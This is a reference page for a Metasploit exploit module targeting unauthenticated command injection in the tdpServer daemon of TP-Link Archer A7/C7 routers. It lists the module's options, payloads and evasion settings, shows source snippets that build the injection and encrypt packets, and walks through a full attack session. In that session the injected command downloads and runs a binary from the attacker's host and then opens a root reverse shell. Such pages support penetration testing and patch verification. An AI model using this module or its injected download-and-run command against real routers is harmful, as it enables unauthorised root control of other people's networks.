TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution - Metasploit


This page contains detailed information about how to use the exploit/linux/misc/tplink_archer_a7_c7_lan_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution
Module: exploit/linux/misc/tplink_archer_a7_c7_lan_rce
Source code: modules/exploits/linux/misc/tplink_archer_a7_c7_lan_rce.rb
Disclosure date: 2020-03-25
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): mipsbe
Supported platform(s): Linux
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 20002
List of CVEs: CVE-2020-10882, CVE-2020-10883, CVE-2020-10884, CVE-2020-28347

This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726. The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host. This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + Radek Domanski). This module was updated in November 2020, after a bypass was discovered for the patch TP-Link issued. The new injection technique works on older firmware too. All firmware versions up to (but excluding) releases 201029 and 201030 are exploitable.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Basic Usage


msf > use exploit/linux/misc/tplink_archer_a7_c7_lan_rce
msf exploit(tplink_archer_a7_c7_lan_rce) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726. The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command as root, including downloading and executing a binary from another host.

This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + Radek Domanski). This module was updated in November 2020, after a bypass was discovered for the patch TP-Link issued. The new injection technique works on older firmware too. All firmware versions up to (but excluding) releases 201029 and 201030 are exploitable.

Vulnerable Application


TP-Link Archer A7 (AC1750) v5 firmware version 190726 TP-Link Archer C7 (AC1750) v5 firmware version 190726

Firmware TP-Link Archer A7 Firmware TP-Link Archer C7

Verification Steps


Example steps in this format (is also in the PR):

  1. Connect to a target on the LAN interface
  2. Start msfconsole
  3. Do: use exploits/linux/misc/tplink_archer_a7_c7_lan_rce
  4. Set RHOST, LHOST and SRVHOST
  5. Do check
  6. Do: run
  7. You should get a shell.

Options


Module options (exploit/linux/misc/tplink_archerC7_lan_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT    20002            yes       The target port (TCP)
   SRVHOST                   yes       IP address of the host serving the exploit
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Scenarios


msf5 > use exploits/linux/misc/tplink_archer_a7_c7_lan_rce
msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set RHOST 192.168.0.1
RHOST => 192.168.0.1
msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set LHOST 192.168.0.238
LHOST => 192.168.0.238
msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > set SRVHOST 192.168.0.238
SRVHOST => 192.168.0.238
msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > check 
[+] 192.168.0.1:20002 - The target is vulnerable.
msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > 
[*] Started reverse TCP handler on 192.168.0.238:4444 
[*] Attempting to exploit TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)
[*] Starting up our web service on http://192.168.0.238:4445 ...
[*] Using URL: http://192.168.0.238:4445/x
[*] 192.168.0.1:20002 - Connecting to the target
[*] 192.168.0.1:20002 - Sending command file byte by byte
[*] 192.168.0.1:20002 - Command: wget http://192.168.0.238:4445/x;chmod +x x;./x
[*] 192.168.0.1:20002 - [0%]= = => - - - - - - - - - - - - - - - -[100%]
[*] 192.168.0.1:20002 - [0%]= = = = = = => - - - - - - - - - - - -[100%]
[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = => - - - - - - - -[100%]
[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = = = = = => - - - -[100%]
[*] 192.168.0.1:20002 - [0%]= = = = = = = = = = = = = = = = = = =>[100%]
[*] 192.168.0.1:20002 - Command file sent, attempting to execute...
[+] 192.168.0.1:20002 - Sending executable to the router
[+] 192.168.0.1:20002 - Sit back and relax, Shelly will come visit soon!
[*] Command shell session 1 opened (192.168.0.238:4444 -> 192.168.0.1:48112) at 2020-03-26 16:47:09 +0100
[*] Server stopped.

msf5 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > sessions 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root)
uname -a
Linux ArcherC7v5 3.3.8 #1 Mon May 20 18:53:02 CST 2019 mips GNU/Linux

Go back to menu.

Msfconsole Usage


Here is how the linux/misc/tplink_archer_a7_c7_lan_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/misc/tplink_archer_a7_c7_lan_rce

[*] Using configured payload linux/mipsbe/shell_reverse_tcp
msf6 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > show info

       Name: TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution
     Module: exploit/linux/misc/tplink_archer_a7_c7_lan_rce
   Platform: Linux
       Arch: mipsbe
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-03-25

Provided by:
  Pedro Ribeiro <[email protected]>
  Radek Domanski <radek.domanski <Radek Domanski <[email protected]> @RabbitPro>

Available targets:
  Id  Name
  --  ----
  0   TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    20002            yes       The target port (TCP)
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)
  VHOST                     no        HTTP server virtual host

Payload information:

Description:
  This module exploits a command injection vulnerability in the 
  tdpServer daemon (/usr/bin/tdpServer), running on the router TP-Link 
  Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, 
  firmware version 190726. The vulnerability can only be exploited by 
  an attacker on the LAN side of the router, but the attacker does not 
  need any authentication to abuse it. After exploitation, an attacker 
  will be able to execute any command as root, including downloading 
  and executing a binary from another host. This vulnerability was 
  discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team 
  (Pedro Ribeiro + Radek Domanski). This module was updated in 
  November 2020, after a bypass was discovered for the patch TP-Link 
  issued. The new injection technique works on older firmware too. All 
  firmware versions up to (but excluding) releases 201029 and 201030 
  are exploitable.

References:
  https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo
  https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md
  https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md
  https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2020/minesweeper.md
  https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2020/minesweeper.md
  https://nvd.nist.gov/vuln/detail/CVE-2020-10882
  https://nvd.nist.gov/vuln/detail/CVE-2020-10883
  https://nvd.nist.gov/vuln/detail/CVE-2020-10884
  https://nvd.nist.gov/vuln/detail/CVE-2020-28347
  http://www.zerodayinitiative.com/advisories/ZDI-20-334
  http://www.zerodayinitiative.com/advisories/ZDI-20-335
  http://www.zerodayinitiative.com/advisories/ZDI-20-336

Module Options


This is a complete list of options available in the linux/misc/tplink_archer_a7_c7_lan_rce exploit:

msf6 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > show options

Module options (exploit/linux/misc/tplink_archer_a7_c7_lan_rce):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    20002            yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host

Payload options (linux/mipsbe/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)

Advanced Options


Here is a complete list of advanced options supported by the linux/misc/tplink_archer_a7_c7_lan_rce exploit:

msf6 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > show advanced

Module advanced options (exploit/linux/misc/tplink_archer_a7_c7_lan_rce):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   CHOST                                                                       no        The local client address
   CPORT                                                                       no        The local client port
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   ListenerComm                                                                no        The specific communication channel to use for this service
   MAX_WAIT                15                                                  yes       Number of seconds to wait for payload download
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                                   no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false                                               no        Enable SSL/TLS-level compression
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false                                               no        Return a robots.txt file if asked for one
   URIHOST                                                                     no        Host to use in URI (useful for tunnels)
   URIPORT                                                                     no        Port to use in URI (useful for tunnels)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                15                                                  no        Additional delay in seconds to wait for a session

Payload advanced options (linux/mipsbe/shell_reverse_tcp):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AppendExit                  false            no        Append a stub that executes the exit(0) system call
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel       0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PrependChrootBreak          false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                 false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid               false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid             false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid            false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid            false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid             false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid               false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                   no        Redirect Debug Info to a Log File
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/misc/tplink_archer_a7_c7_lan_rce module can exploit:

msf6 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/misc/tplink_archer_a7_c7_lan_rce exploit:

msf6 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > show payloads

Compatible Payloads
===================

   #   Name                                            Disclosure Date  Rank    Check  Description
   -   ----                                            ---------------  ----    -----  -----------
   0   payload/generic/custom                                           normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                   normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                                normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/mipsbe/exec                                        normal  No     Linux Execute Command
   4   payload/linux/mipsbe/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
   5   payload/linux/mipsbe/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
   6   payload/linux/mipsbe/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
   7   payload/linux/mipsbe/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
   8   payload/linux/mipsbe/reboot                                      normal  No     Linux Reboot
   9   payload/linux/mipsbe/shell/reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   10  payload/linux/mipsbe/shell_bind_tcp                              normal  No     Linux Command Shell, Bind TCP Inline
   11  payload/linux/mipsbe/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/misc/tplink_archer_a7_c7_lan_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/misc/tplink_archer_a7_c7_lan_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> - Failed to encrypt packet!


Here is a relevant code snippet related to the "<PEER> - Failed to encrypt packet!" error message:

308:	    inject = "\'`sh #{@cmd_file}`\'"
309:	    payload = create_injection(inject, literal: true)
310:	
311:	    ciphertext = aes_encrypt(payload)
312:	    if !ciphertext
313:	      fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
314:	    end
315:	
316:	    new_packet = packet[0..15]
317:	    new_packet += ciphertext
318:	    new_packet = update_len_field(new_packet, ciphertext.length)

<PEER> - Please specify the LAN IP address of this computer in SRVHOST


Here is a relevant code snippet related to the "<PEER> - Please specify the LAN IP address of this computer in SRVHOST" error message:

330:	    end
331:	  end
332:	
333:	  def exploit
334:	    if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))
335:	      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
336:	    end
337:	
338:	    if datastore['SSL']
339:	      fail_with(Failure::Unknown, 'SSL is not supported on this target, please disable it')
340:	    end

SSL is not supported on this target, please disable it


Here is a relevant code snippet related to the "SSL is not supported on this target, please disable it" error message:

334:	    if ((datastore['SRVHOST'] == '0.0.0.0') || (datastore['SRVHOST'] == '::'))
335:	      fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST")
336:	    end
337:	
338:	    if datastore['SSL']
339:	      fail_with(Failure::Unknown, 'SSL is not supported on this target, please disable it')
340:	    end
341:	
342:	    print_status("Attempting to exploit #{target.name}")
343:	
344:	    tpdp_packet_template =

<PEER> - Failed to setup download command!


Here is a relevant code snippet related to the "<PEER> - Failed to setup download command!" error message:

382:	
383:	    download_cmd.each_char.with_index do |c, index|
384:	      # Generate payload
385:	      payload = create_injection(c)
386:	      if !payload
387:	        fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!")
388:	      end
389:	
390:	      # Encrypt payload
391:	      ciphertext = aes_encrypt(payload)
392:	      if !ciphertext

<PEER> - Failed to encrypt packet!


Here is a relevant code snippet related to the "<PEER> - Failed to encrypt packet!" error message:

388:	      end
389:	
390:	      # Encrypt payload
391:	      ciphertext = aes_encrypt(payload)
392:	      if !ciphertext
393:	        fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!")
394:	      end
395:	
396:	      tpdp_packet = tpdp_packet_template.dup
397:	      tpdp_packet += ciphertext
398:	      tpdp_packet = update_len_field(tpdp_packet, ciphertext.length)

<PEER> - Timeout reached! Payload was not downloaded :(


Here is a relevant code snippet related to the "<PEER> - Timeout reached! Payload was not downloaded :(" error message:

426:	    timeout = 0
427:	    until @payload_sent
428:	      Rex.sleep(1)
429:	      timeout += 1
430:	      if timeout == datastore['MAX_WAIT'].to_i
431:	        fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(")
432:	      end
433:	    end
434:	
435:	    disconnect_udp
436:	  end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Pedro Ribeiro <pedrib[at]gmail.com>
  • Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro

Version


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.